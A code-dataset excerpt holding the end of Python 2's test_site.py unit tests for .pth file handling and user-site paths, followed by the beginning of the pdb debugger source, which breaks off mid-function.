The setting of the encoding (set using sys.setdefaultencoding) used by
the Unicode implementation is not tested.
"""
def setUp(self):
"""Save a copy of sys.path"""
self.sys_path = sys.path[:]
self.old_base = site.USER_BASE
self.old_site = site.USER_SITE
self.old_prefixes = site.PREFIXES
self.old_vars = copy(sysconfig._CONFIG_VARS)
def tearDown(self):
"""Restore sys.path"""
sys.path[:] = self.sys_path
site.USER_BASE = self.old_base
site.USER_SITE = self.old_site
site.PREFIXES = self.old_prefixes
sysconfig._CONFIG_VARS = self.old_vars
def test_makepath(self):
# Test makepath() have an absolute path for its first return value
# and a case-normalized version of the absolute path for its
# second value.
path_parts = ("Beginning", "End")
original_dir = os.path.join(*path_parts)
abs_dir, norm_dir = site.makepath(*path_parts)
self.assertEqual(os.path.abspath(original_dir), abs_dir)
if original_dir == os.path.normcase(original_dir):
self.assertEqual(abs_dir, norm_dir)
else:
self.assertEqual(os.path.normcase(abs_dir), norm_dir)
def test_init_pathinfo(self):
dir_set = site._init_pathinfo()
for entry in [site.makepath(path)[1] for path in sys.path
if path and os.path.isdir(path)]:
self.assertIn(entry, dir_set,
"%s from sys.path not found in set returned "
"by _init_pathinfo(): %s" % (entry, dir_set))
def pth_file_tests(self, pth_file):
"""Contain common code for testing results of reading a .pth file"""
self.assertIn(pth_file.imported, sys.modules,
"%s not in sys.modules" % pth_file.imported)
self.assertIn(site.makepath(pth_file.good_dir_path)[0], sys.path)
self.assertFalse(os.path.exists(pth_file.bad_dir_path))
def test_addpackage(self):
# Make sure addpackage() imports if the line starts with 'import',
# adds directories to sys.path for any line in the file that is not a
# comment or import that is a valid directory name for where the .pth
# file resides; invalid directories are not added
pth_file = PthFile()
pth_file.cleanup(prep=True) # to make sure that nothing is
# pre-existing that shouldn't be
try:
pth_file.create()
site.addpackage(pth_file.base_dir, pth_file.filename, set())
self.pth_file_tests(pth_file)
finally:
pth_file.cleanup()
def make_pth(self, contents, pth_dir='.', pth_name=TESTFN):
# Create a .pth file and return its (abspath, basename).
pth_dir = os.path.abspath(pth_dir)
pth_basename = pth_name + '.pth'
pth_fn = os.path.join(pth_dir, pth_basename)
pth_file = open(pth_fn, 'w')
self.addCleanup(lambda: os.remove(pth_fn))
pth_file.write(contents)
pth_file.close()
return pth_dir, pth_basename
def test_addpackage_import_bad_syntax(self):
# Issue 10642
pth_dir, pth_fn = self.make_pth("import bad)syntax\n")
with captured_output("stderr") as err_out:
site.addpackage(pth_dir, pth_fn, set())
self.assertRegexpMatches(err_out.getvalue(), "line 1")
self.assertRegexpMatches(err_out.getvalue(),
re.escape(os.path.join(pth_dir, pth_fn)))
# XXX: the previous two should be independent checks so that the
# order doesn't matter. The next three could be a single check
# but my regex foo isn't good enough to write it.
self.assertRegexpMatches(err_out.getvalue(), 'Traceback')
self.assertRegexpMatches(err_out.getvalue(), r'import bad\)syntax')
self.assertRegexpMatches(err_out.getvalue(), 'SyntaxError')
def test_addpackage_import_bad_exec(self):
# Issue 10642
pth_dir, pth_fn = self.make_pth("randompath\nimport nosuchmodule\n")
with captured_output("stderr") as err_out:
site.addpackage(pth_dir, pth_fn, set())
self.assertRegexpMatches(err_out.getvalue(), "line 2")
self.assertRegexpMatches(err_out.getvalue(),
re.escape(os.path.join(pth_dir, pth_fn)))
# XXX: ditto previous XXX comment.
self.assertRegexpMatches(err_out.getvalue(), 'Traceback')
self.assertRegexpMatches(err_out.getvalue(), 'ImportError')
@unittest.skipIf(is_jython, "FIXME: not on Jython yet.")
@unittest.skipIf(sys.platform == "win32", "Windows does not raise an "
"error for file paths containing null characters")
def test_addpackage_import_bad_pth_file(self):
# Issue 5258
pth_dir, pth_fn = self.make_pth("abc\x00def\n")
with captured_output("stderr") as err_out:
site.addpackage(pth_dir, pth_fn, set())
self.assertRegexpMatches(err_out.getvalue(), "line 1")
self.assertRegexpMatches(err_out.getvalue(),
re.escape(os.path.join(pth_dir, pth_fn)))
# XXX: ditto previous XXX comment.
self.assertRegexpMatches(err_out.getvalue(), 'Traceback')
self.assertRegexpMatches(err_out.getvalue(), 'TypeError')
def test_addsitedir(self):
# Same tests for test_addpackage since addsitedir() essentially just
# calls addpackage() for every .pth file in the directory
pth_file = PthFile()
pth_file.cleanup(prep=True) # Make sure that nothing is pre-existing
# that is tested for
try:
pth_file.create()
site.addsitedir(pth_file.base_dir, set())
self.pth_file_tests(pth_file)
finally:
pth_file.cleanup()
@unittest.skipIf(is_jython, "FIXME: not on Jython yet.")
@unittest.skipUnless(site.ENABLE_USER_SITE, "requires access to PEP 370 "
"user-site (site.ENABLE_USER_SITE)")
def test_s_option(self):
usersite = site.USER_SITE
self.assertIn(usersite, sys.path)
env = os.environ.copy()
rc = subprocess.call([sys.executable, '-c',
'import sys; sys.exit(%r in sys.path)' % usersite],
env=env)
self.assertEqual(rc, 1, "%r is not in sys.path (sys.exit returned %r)"
% (usersite, rc))
env = os.environ.copy()
rc = subprocess.call([sys.executable, '-s', '-c',
'import sys; sys.exit(%r in sys.path)' % usersite],
env=env)
self.assertEqual(rc, 0)
env = os.environ.copy()
env["PYTHONNOUSERSITE"] = "1"
rc = subprocess.call([sys.executable, '-c',
'import sys; sys.exit(%r in sys.path)' % usersite],
env=env)
self.assertEqual(rc, 0)
env = os.environ.copy()
env["PYTHONUSERBASE"] = "/tmp"
rc = subprocess.call([sys.executable, '-c',
'import sys, site; sys.exit(site.USER_BASE.startswith("/tmp"))'],
env=env)
self.assertEqual(rc, 1)
@unittest.skipIf(is_jython, "FIXME: not on Jython yet.")
def test_getuserbase(self):
site.USER_BASE = None
user_base = site.getuserbase()
# the call sets site.USER_BASE
self.assertEqual(site.USER_BASE, user_base)
# let's set PYTHONUSERBASE and see if it uses it
site.USER_BASE = None
import sysconfig
sysconfig._CONFIG_VARS = None
with EnvironmentVarGuard() as environ:
environ['PYTHONUSERBASE'] = 'xoxo'
self.assertTrue(site.getuserbase().startswith('xoxo'),
site.getuserbase())
def test_getusersitepackages(self):
site.USER_SITE = None
site.USER_BASE = None
user_site = site.getusersitepackages()
# the call sets USER_BASE *and* USER_SITE
self.assertEqual(site.USER_SITE, user_site)
self.assertTrue(user_site.startswith(site.USER_BASE), user_site)
def test_getsitepackages(self):
site.PREFIXES = ['xoxo']
dirs = site.getsitepackages()
if sys.platform in ('os2emx', 'riscos') or is_jython:
self.assertEqual(len(dirs), 1)
wanted = os.path.join('xoxo', 'Lib', 'site-packages')
self.assertEqual(dirs[0], wanted)
elif (sys.platform == "darwin" and
sysconfig.get_config_var("PYTHONFRAMEWORK")):
# OS X framework builds
site.PREFIXES = ['Python.framework']
dirs = site.getsitepackages()
self.assertEqual(len(dirs), 3)
wanted = os.path.join('/Library',
sysconfig.get_config_var("PYTHONFRAMEWORK"),
sys.version[:3],
'site-packages')
self.assertEqual(dirs[2], wanted)
elif os.sep == '/':
# OS X non-framwework builds, Linux, FreeBSD, etc
self.assertEqual(len(dirs), 2)
wanted = os.path.join('xoxo', 'lib', 'python' + sys.version[:3],
'site-packages')
self.assertEqual(dirs[0], wanted)
wanted = os.path.join('xoxo', 'lib', 'site-python')
self.assertEqual(dirs[1], wanted)
else:
# other platforms
self.assertEqual(len(dirs), 2)
self.assertEqual(dirs[0], 'xoxo')
wanted = os.path.join('xoxo', 'lib', 'site-packages')
self.assertEqual(dirs[1], wanted)
class PthFile(object):
"""Helper class for handling testing of .pth files"""
def __init__(self, filename_base=TESTFN, imported="time",
good_dirname="__testdir__", bad_dirname="__bad"):
"""Initialize instance variables"""
self.filename = filename_base + ".pth"
self.base_dir = os.path.abspath('')
self.file_path = os.path.join(self.base_dir, self.filename)
self.imported = imported
self.good_dirname = good_dirname
self.bad_dirname = bad_dirname
self.good_dir_path = os.path.join(self.base_dir, self.good_dirname)
self.bad_dir_path = os.path.join(self.base_dir, self.bad_dirname)
def create(self):
"""Create a .pth file with a comment, blank lines, an ``import
<self.imported>``, a line with self.good_dirname, and a line with
self.bad_dirname.
Creation of the directory for self.good_dir_path (based off of
self.good_dirname) is also performed.
Make sure to call self.cleanup() to undo anything done by this method.
"""
FILE = open(self.file_path, 'w')
try:
print>>FILE, "#import @bad module name"
print>>FILE, "\n"
print>>FILE, "import %s" % self.imported
print>>FILE, self.good_dirname
print>>FILE, self.bad_dirname
finally:
FILE.close()
os.mkdir(self.good_dir_path)
def cleanup(self, prep=False):
"""Make sure that the .pth file is deleted, self.imported is not in
sys.modules, and that both self.good_dirname and self.bad_dirname are
not existing directories."""
if os.path.exists(self.file_path):
os.remove(self.file_path)
if prep:
self.imported_module = sys.modules.get(self.imported)
if self.imported_module:
del sys.modules[self.imported]
else:
if self.imported_module:
sys.modules[self.imported] = self.imported_module
if os.path.exists(self.good_dir_path):
os.rmdir(self.good_dir_path)
if os.path.exists(self.bad_dir_path):
os.rmdir(self.bad_dir_path)
class ImportSideEffectTests(unittest.TestCase):
"""Test side-effects from importing 'site'."""
def setUp(self):
"""Make a copy of sys.path"""
self.sys_path = sys.path[:]
def tearDown(self):
"""Restore sys.path"""
sys.path[:] = self.sys_path
def test_abs__file__(self):
# Make sure all imported modules have their __file__ attribute
# as an absolute path.
# Handled by abs__file__()
site.abs__file__()
for module in (sys, os, __builtin__):
try:
self.assertTrue(os.path.isabs(module.__file__), repr(module))
except AttributeError:
continue
# We could try everything in sys.modules; however, when regrtest.py
# runs something like test_frozen before test_site, then we will
# be testing things loaded *after* test_site did path normalization
def test_no_duplicate_paths(self):
# No duplicate paths should exist in sys.path
# Handled by removeduppaths()
site.removeduppaths()
seen_paths = set()
for path in sys.path:
self.assertNotIn(path, seen_paths)
seen_paths.add(path)
def test_add_build_dir(self):
# Test that the build directory's Modules directory is used when it
# should be.
# XXX: implement
pass
def test_setting_quit(self):
# 'quit' and 'exit' should be injected into __builtin__
self.assertTrue(hasattr(__builtin__, "quit"))
self.assertTrue(hasattr(__builtin__, "exit"))
def test_setting_copyright(self):
# 'copyright' and 'credits' should be in __builtin__
self.assertTrue(hasattr(__builtin__, "copyright"))
self.assertTrue(hasattr(__builtin__, "credits"))
def test_setting_help(self):
# 'help' should be set in __builtin__
self.assertTrue(hasattr(__builtin__, "help"))
def test_aliasing_mbcs(self):
if sys.platform == "win32":
import locale
if locale.getdefaultlocale()[1].startswith('cp'):
for value in encodings.aliases.aliases.itervalues():
if value == "mbcs":
break
else:
self.fail("did not alias mbcs")
def test_setdefaultencoding_removed(self):
# Make sure sys.setdefaultencoding is gone
self.assertTrue(not hasattr(sys, "setdefaultencoding"))
def test_sitecustomize_executed(self):
# If sitecustomize is available, it should have been imported.
if "sitecustomize" not in sys.modules:
try:
import sitecustomize
except ImportError:
pass
else:
self.fail("sitecustomize not imported automatically")
def test_main():
run_unittest(HelperFunctionsTests, ImportSideEffectTests)
if __name__ == "__main__":
test_main()
| epl-1.0 |
xyzz/vcmi-build | project/jni/python/src/Lib/pdb.py | 51 | 44829 | #! /usr/bin/env python
"""A Python debugger."""
# (See pdb.doc for documentation.)
import sys
import linecache
import cmd
import bdb
from repr import Repr
import os
import re
import pprint
import traceback
class Restart(Exception):
"""Causes a debugger to be restarted for the debugged python program."""
pass
# Create a custom safe Repr instance and increase its maxstring.
# The default of 30 truncates error messages too easily.
_repr = Repr()
_repr.maxstring = 200
_saferepr = _repr.repr
__all__ = ["run", "pm", "Pdb", "runeval", "runctx", "runcall", "set_trace",
"post_mortem", "help"]
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % re.escape(funcname))
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while 1:
line = fp.readline()
if line == '':
break
if cre.match(line):
answer = funcname, filename, lineno
break
lineno = lineno + 1
fp.close()
return answer
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pdb is imported using the
# command "pdb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Pdb(bdb.Bdb, cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None):
bdb.Bdb.__init__(self)
cmd.Cmd.__init__(self, completekey, stdin, stdout)
if stdout:
self.use_rawinput = 0
self.prompt = '(Pdb) '
self.aliases = {}
self.mainpyfile = ''
self._wait_for_mainpyfile = 0
# Try to load readline if it exists
try:
import readline
except ImportError:
pass
# Read $HOME/.pdbrc and ./.pdbrc
self.rcLines = []
if 'HOME' in os.environ:
envHome = os.environ['HOME']
try:
rcFile = open(os.path.join(envHome, ".pdbrc"))
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
try:
rcFile = open(".pdbrc")
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
self.commands = {} # associates a command list to breakpoint numbers
self.commands_doprompt = {} # for each bp num, tells if the prompt must be disp. after execing the cmd list
self.commands_silent = {} # for each bp num, tells if the stack trace must be disp. after execing the cmd list
self.commands_defining = False # True while in the process of defining a command list
self.commands_bnum = None # The breakpoint number for which we are defining a list
def reset(self):
bdb.Bdb.reset(self)
self.forget()
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
def setup(self, f, t):
self.forget()
self.stack, self.curindex = self.get_stack(f, t)
self.curframe = self.stack[self.curindex][0]
self.execRcLines()
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
if self.rcLines:
# Make local copy because of recursion
rcLines = self.rcLines
# executed only once
self.rcLines = []
for line in rcLines:
line = line[:-1]
if len(line) > 0 and line[0] != '#':
self.onecmd(line)
# Override Bdb methods
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile:
return
if self.stop_here(frame):
print >>self.stdout, '--Call--'
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
if (self.mainpyfile != self.canonic(frame.f_code.co_filename)
or frame.f_lineno<= 0):
return
self._wait_for_mainpyfile = 0
if self.bp_commands(frame):
self.interaction(frame, None)
def bp_commands(self,frame):
""" Call every command that was set for the current active breakpoint (if there is one)
Returns True if the normal interaction function must be called, False otherwise """
#self.currentbp is set in bdb.py in bdb.break_here if a breakpoint was hit
if getattr(self,"currentbp",False) and self.currentbp in self.commands:
currentbp = self.currentbp
self.currentbp = 0
lastcmd_back = self.lastcmd
self.setup(frame, None)
for line in self.commands[currentbp]:
self.onecmd(line)
self.lastcmd = lastcmd_back
if not self.commands_silent[currentbp]:
self.print_stack_entry(self.stack[self.curindex])
if self.commands_doprompt[currentbp]:
self.cmdloop()
self.forget()
return
return 1
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
frame.f_locals['__return__'] = return_value
print >>self.stdout, '--Return--'
self.interaction(frame, None)
def user_exception(self, frame, exc_info):
exc_type, exc_value, exc_traceback = exc_info
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
frame.f_locals['__exception__'] = exc_type, exc_value
if type(exc_type) == type(''):
exc_type_name = exc_type
else: exc_type_name = exc_type.__name__
print >>self.stdout, exc_type_name + ':', _saferepr(exc_value)
self.interaction(frame, exc_traceback)
# General interaction function
def interaction(self, frame, traceback):
self.setup(frame, traceback)
self.print_stack_entry(self.stack[self.curindex])
self.cmdloop()
self.forget()
def displayhook(self, obj):
"""Custom displayhook for the exec in default(), which prevents
assignment of the _ variable in the builtins.
"""
print repr(obj)
def default(self, line):
if line[:1] == '!': line = line[1:]
locals = self.curframe.f_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
save_stdout = sys.stdout
save_stdin = sys.stdin
save_displayhook = sys.displayhook
try:
sys.stdin = self.stdin
sys.stdout = self.stdout
sys.displayhook = self.displayhook
exec code in globals, locals
finally:
sys.stdout = save_stdout
sys.stdin = save_stdin
sys.displayhook = save_displayhook
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', v
def precmd(self, line):
"""Handle alias expansion and ';;' separator."""
if not line.strip():
return line
args = line.split()
while args[0] in self.aliases:
line = self.aliases[args[0]]
ii = 1
for tmpArg in args[1:]:
line = line.replace("%" + str(ii),
tmpArg)
ii = ii + 1
line = line.replace("%*", ' '.join(args[1:]))
args = line.split()
# split into ';;' separated commands
# unless it's an alias command
if args[0] != 'alias':
marker = line.find(';;')
if marker >= 0:
# queue up everything after marker
next = line[marker+2:].lstrip()
self.cmdqueue.append(next)
line = line[:marker].rstrip()
return line
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
Checks whether this line is typed at the normal prompt or in
a breakpoint command list definition.
"""
if not self.commands_defining:
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
def handle_command_def(self,line):
""" Handles one command line during command list definition. """
cmd, arg, line = self.parseline(line)
if cmd == 'silent':
self.commands_silent[self.commands_bnum] = True
return # continue to handle other cmd def in the cmd list
elif cmd == 'end':
self.cmdqueue = []
return 1 # end of cmd list
cmdlist = self.commands[self.commands_bnum]
if (arg):
cmdlist.append(cmd+' '+arg)
else:
cmdlist.append(cmd)
# Determine if we must stop
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
func = self.default
if func.func_name in self.commands_resuming : # one of the resuming commands.
self.commands_doprompt[self.commands_bnum] = False
self.cmdqueue = []
return 1
return
# Command definitions, called by cmdloop()
# The argument is the remaining string on the command line
# Return true to exit from the command loop
do_h = cmd.Cmd.do_help
def do_commands(self, arg):
"""Defines a list of commands associated to a breakpoint
Those commands will be executed whenever the breakpoint causes the program to stop execution."""
if not arg:
bnum = len(bdb.Breakpoint.bpbynumber)-1
else:
try:
bnum = int(arg)
except:
print >>self.stdout, "Usage : commands [bnum]\n ...\n end"
return
self.commands_bnum = bnum
self.commands[bnum] = []
self.commands_doprompt[bnum] = True
self.commands_silent[bnum] = False
prompt_back = self.prompt
self.prompt = '(com) '
self.commands_defining = True
self.cmdloop()
self.commands_defining = False
self.prompt = prompt_back
def do_break(self, arg, temporary = 0):
# break [ ([filename:]lineno | function) [, "condition"] ]
if not arg:
if self.breaks: # There's at least one
print >>self.stdout, "Num Type Disp Enb Where"
for bp in bdb.Breakpoint.bpbynumber:
if bp:
bp.bpprint(self.stdout)
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
funcname = None
if colon >= 0:
filename = arg[:colon].rstrip()
f = self.lookupmodule(filename)
if not f:
print >>self.stdout, '*** ', repr(filename),
print >>self.stdout, 'not found from sys.path'
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError, msg:
print >>self.stdout, '*** Bad lineno:', arg
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self.curframe.f_globals,
self.curframe.f_locals)
except:
func = arg
try:
if hasattr(func, 'im_func'):
func = func.im_func
code = func.func_code
#use co_name to identify the bkpt (function names
#could be aliased, but co_name is invariant)
funcname = code.co_name
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self.lineinfo(arg)
if not ok:
print >>self.stdout, '*** The specified object',
print >>self.stdout, repr(arg),
print >>self.stdout, 'is not a function'
print >>self.stdout, 'or was not found along sys.path.'
return
funcname = ok # ok contains a function name
lineno = int(ln)
if not filename:
filename = self.defaultFile()
# Check for reasonable breakpoint
line = self.checkline(filename, lineno)
if line:
# now set the break point
err = self.set_break(filename, line, temporary, cond, funcname)
if err: print >>self.stdout, '***', err
else:
bp = self.get_breaks(filename, line)[-1]
print >>self.stdout, "Breakpoint %d at %s:%d" % (bp.number,
bp.file,
bp.line)
# To be overridden in derived debuggers
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
if filename == '<string>' and self.mainpyfile:
filename = self.mainpyfile
return filename
do_b = do_break
def do_tbreak(self, arg):
self.do_break(arg, 1)
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '': return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = self.lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
def checkline(self, filename, lineno):
"""Check whether specified line seems to be executable.
Return `lineno` if it is, 0 if not (e.g. a docstring, comment, blank
line or EOF). Warning: testing is not comprehensive.
"""
line = linecache.getline(filename, lineno, self.curframe.f_globals)
if not line:
print >>self.stdout, 'End of file'
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
print >>self.stdout, '*** Blank or comment'
return 0
return lineno
def do_enable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.enable()
def do_disable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.disable()
def do_condition(self, arg):
# arg is breakpoint number and condition
args = arg.split(' ', 1)
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
cond = args[1]
except:
cond = None
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.cond = cond
if not cond:
print >>self.stdout, 'Breakpoint', bpnum,
print >>self.stdout, 'is now unconditional.'
def do_ignore(self,arg):
"""arg is bp number followed by ignore count."""
args = arg.split()
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print >>self.stdout, \
'Breakpoint index %r is not a number' % args[0]
return
try:
count = int(args[1].strip())
except:
count = 0
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print >>self.stdout, 'Breakpoint index %r is not valid' % args[0]
return
if bp:
bp.ignore = count
if count > 0:
reply = 'Will ignore next '
if count > 1:
reply = reply + '%d crossings' % count
else:
reply = reply + '1 crossing'
print >>self.stdout, reply + ' of breakpoint %d.' % bpnum
else:
print >>self.stdout, 'Will stop next time breakpoint',
print >>self.stdout, bpnum, 'is reached.'
def do_clear(self, arg):
"""Three possibilities, tried in this order:
clear -> clear all breaks, ask for confirmation
clear file:lineno -> clear all breaks at file:lineno
clear bpno bpno ... -> clear breakpoints by number"""
if not arg:
try:
reply = raw_input('Clear all breaks? ')
except EOFError:
reply = 'no'
reply = reply.strip().lower()
if reply in ('y', 'yes'):
self.clear_all_breaks()
return
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except ValueError:
err = "Invalid line number (%s)" % arg
else:
err = self.clear_break(filename, lineno)
if err: print >>self.stdout, '***', err
return
numberlist = arg.split()
for i in numberlist:
try:
i = int(i)
except ValueError:
print >>self.stdout, 'Breakpoint index %r is not a number' % i
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print >>self.stdout, 'No breakpoint numbered', i
continue
err = self.clear_bpbynumber(i)
if err:
print >>self.stdout, '***', err
else:
print >>self.stdout, 'Deleted breakpoint', i
do_cl = do_clear # 'c' is already an abbreviation for 'continue'
def do_where(self, arg):
self.print_stack_trace()
do_w = do_where
do_bt = do_where
def do_up(self, arg):
if self.curindex == 0:
print >>self.stdout, '*** Oldest frame'
else:
self.curindex = self.curindex - 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_u = do_up
def do_down(self, arg):
if self.curindex + 1 == len(self.stack):
print >>self.stdout, '*** Newest frame'
else:
self.curindex = self.curindex + 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_d = do_down
def do_until(self, arg):
self.set_until(self.curframe)
return 1
do_unt = do_until
def do_step(self, arg):
self.set_step()
return 1
do_s = do_step
def do_next(self, arg):
self.set_next(self.curframe)
return 1
do_n = do_next
def do_run(self, arg):
"""Restart program by raising an exception to be caught in the main debugger
loop. If arguments were given, set them in sys.argv."""
if arg:
import shlex
argv0 = sys.argv[0:1]
sys.argv = shlex.split(arg)
sys.argv[:0] = argv0
raise Restart
do_restart = do_run
def do_return(self, arg):
self.set_return(self.curframe)
return 1
do_r = do_return
def do_continue(self, arg):
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_jump(self, arg):
if self.curindex + 1 != len(self.stack):
print >>self.stdout, "*** You can only jump within the bottom frame"
return
try:
arg = int(arg)
except ValueError:
print >>self.stdout, "*** The 'jump' command requires a line number."
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self.curframe.f_lineno = arg
self.stack[self.curindex] = self.stack[self.curindex][0], arg
self.print_stack_entry(self.stack[self.curindex])
except ValueError, e:
print >>self.stdout, '*** Jump failed:', e
do_j = do_jump
def do_debug(self, arg):
sys.settrace(None)
globals = self.curframe.f_globals
locals = self.curframe.f_locals
p = Pdb(self.completekey, self.stdin, self.stdout)
p.prompt = "(%s) " % self.prompt.strip()
print >>self.stdout, "ENTERING RECURSIVE DEBUGGER"
sys.call_tracing(p.run, (arg, globals, locals))
print >>self.stdout, "LEAVING RECURSIVE DEBUGGER"
sys.settrace(self.trace_dispatch)
self.lastcmd = p.lastcmd
def do_quit(self, arg):
self._user_requested_quit = 1
self.set_quit()
return 1
do_q = do_quit
do_exit = do_quit
def do_EOF(self, arg):
print >>self.stdout
self._user_requested_quit = 1
self.set_quit()
return 1
def do_args(self, arg):
f = self.curframe
co = f.f_code
dict = f.f_locals
n = co.co_argcount
if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
print >>self.stdout, name, '=',
if name in dict: print >>self.stdout, dict[name]
else: print >>self.stdout, "*** undefined ***"
do_a = do_args
def do_retval(self, arg):
if '__return__' in self.curframe.f_locals:
print >>self.stdout, self.curframe.f_locals['__return__']
else:
print >>self.stdout, '*** Not yet returned!'
do_rv = do_retval
def _getval(self, arg):
try:
return eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
raise
def do_p(self, arg):
try:
print >>self.stdout, repr(self._getval(arg))
except:
pass
def do_pp(self, arg):
try:
pprint.pprint(self._getval(arg), self.stdout)
except:
pass
def do_list(self, arg):
self.lastcmd = 'list'
last = None
if arg:
try:
x = eval(arg, {}, {})
if type(x) == type(()):
first, last = x
first = int(first)
last = int(last)
if last < first:
# Assume it's a count
last = first + last
else:
first = max(1, int(x) - 5)
except:
print >>self.stdout, '*** Error in argument:', repr(arg)
return
elif self.lineno is None:
first = max(1, self.curframe.f_lineno - 5)
else:
first = self.lineno + 1
if last is None:
last = first + 10
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno, self.curframe.f_globals)
if not line:
print >>self.stdout, '[EOF]'
break
else:
s = repr(lineno).rjust(3)
if len(s) < 4: s = s + ' '
if lineno in breaklist: s = s + 'B'
else: s = s + ' '
if lineno == self.curframe.f_lineno:
s = s + '->'
print >>self.stdout, s + '\t' + line,
self.lineno = lineno
except KeyboardInterrupt:
pass
do_l = do_list
def do_whatis(self, arg):
try:
value = eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print >>self.stdout, '***', exc_type_name + ':', repr(v)
return
code = None
# Is it a function?
try: code = value.func_code
except: pass
if code:
print >>self.stdout, 'Function', code.co_name
return
# Is it an instance method?
try: code = value.im_func.func_code
except: pass
if code:
print >>self.stdout, 'Method', code.co_name
return
# None of the above...
print >>self.stdout, type(value)
def do_alias(self, arg):
args = arg.split()
if len(args) == 0:
keys = self.aliases.keys()
keys.sort()
for alias in keys:
print >>self.stdout, "%s = %s" % (alias, self.aliases[alias])
return
if args[0] in self.aliases and len(args) == 1:
print >>self.stdout, "%s = %s" % (args[0], self.aliases[args[0]])
else:
self.aliases[args[0]] = ' '.join(args[1:])
def do_unalias(self, arg):
args = arg.split()
if len(args) == 0: return
if args[0] in self.aliases:
del self.aliases[args[0]]
#list of all the commands making the program resume execution.
commands_resuming = ['do_continue', 'do_step', 'do_next', 'do_return',
'do_quit', 'do_jump']
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
